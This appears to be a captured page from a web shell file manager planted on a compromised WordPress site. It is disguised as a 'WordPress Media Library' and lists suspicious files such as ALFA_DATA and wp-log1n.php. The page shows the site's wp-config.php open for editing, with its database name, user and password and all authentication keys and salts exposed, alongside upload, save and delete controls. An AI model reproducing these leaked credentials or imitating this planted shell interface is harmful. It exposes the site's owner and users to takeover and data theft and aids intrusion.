⚙ WordPress Media Library
File manager
📁 Media Files
📋 .content
📋 .ftpquota
📋 .htaccess
📋 .well-known
📋 395a5
📋 ALFA_DATA
🔧 about.php
🔧 admin.php
📋 bin
📋 c9f67d
📋 cache
📋 cli
🔧 f350.php
🌐 googleaa8106a26df5450e.html
🌐 googlee7a98e6bb35e2774.html
🔧 index.php
📋 index.php0
🔧 ioxi-o.php
📄 license.txt
🔧 listbox.php
🔧 mah.php
🔧 networks.php
🔧 options.php
📋 php.ini
🌐 readme.html
📄 robots.txt
🔧 search.php
📋 sitemap16.xml
📋 well-known
🔧 wp-activate.php
📋 wp-admin
🔧 wp-blog-header.php
🔧 wp-comments-post.php
🔧 wp-config-sample.php
🔧 wp-config.php
📋 wp-content
🔧 wp-cron.php
📋 wp-includes
🔧 wp-links-opml.php
🔧 wp-load.php
🔧 wp-log1n.php
🔧 wp-login.php
🔧 wp-mail.php
🔧 wp-settings.php
🔧 wp-signup.php
🔧 wp-trackback.php
⬆️ Upload Media
Upload File
📝 Edit: wp-config.php
Size: 3.30 KB | Modified: 2025-10-16 17:55:58
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://codex.wordpress.org/Editing_wp-config.php * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'bioecolo_wp'); /** MySQL database username */ define('DB_USER', 'bioecolo_wp'); /** MySQL database password */ define('DB_PASSWORD', 'l3T,Xq{SB{n)'); /** MySQL hostname */ define('DB_HOST', 'localhost'); /** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8mb4'); /** The Database Collate type. Don't change this if in doubt. */ define('DB_COLLATE', ''); /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', '_q_P(D/JyAh36V?$2@%vP*-0so/#X5U!ITQx@0=N q$,ivr;:qMn3_q.;e{>Ji+B'); define('SECURE_AUTH_KEY', 'obCDZGC-V+zaz?x?|ot|F$e$wpMR-wOn{z7HSyjf: Q?AA;t&fLscgl0|St|fU7<'); define('LOGGED_IN_KEY', '~~5Ep|,d_S< !e(C$>jinO}~Q:#oprl;i(:7#1Hn2AV%5N7%k*Ze(KM~@Q}NQ@YI'); define('NONCE_KEY', 'K;3SKE_luqr)0os<rO3:_!D/^Gwohh{?_k.L+UNbsljovT>oc)Qo3.a@P+Pf?LoH'); define('AUTH_SALT', 'oNBi=m0pW2s.8|2Wu7uU>Yi~u:l2!rbV22p(h,|J<$p!OW?~h2{@oe(*`u?ON|f4'); define('SECURE_AUTH_SALT', 'wG mT%hrH?~U(0iKJv[|Kz.Aohwx%Afh0pO$(t5c2Sg0Jq|<kz1q.F<sxn<:Q2^8'); define('LOGGED_IN_SALT', 'D.mvG6+2Su0{*t`+rLrnV:.Ue]P12Pl4RZ!+nMp?x(XvNQCBZ?wT:3c!I?Qo[#6H'); define('NONCE_SALT', '~ezB!:<Q2,hctX44fe]}KQ%0{6h&NOU!{ELHPcm+]0l5ZqwZzuRqP0-+qY#>C,n^'); /**#@-*/ /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the Codex. * * @link https://codex.wordpress.org/Debugging_in_WordPress */ // Enable WP_DEBUG mode define( 'WP_DEBUG', true ); // Enable Debug logging to the /wp-content/debug.log file define( 'WP_DEBUG_LOG', true ); // Disable display of errors and warnings define( 'WP_DEBUG_DISPLAY', false ); @ini_set( 'display_errors', 0 ); /* That's all, stop editing! Happy blogging. */ /** Absolute path to the WordPress directory. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /** Sets up WordPress vars and included files. */ require_once(ABSPATH . 'wp-settings.php');
💾 Save Changes
📥 Download
🗑️ Delete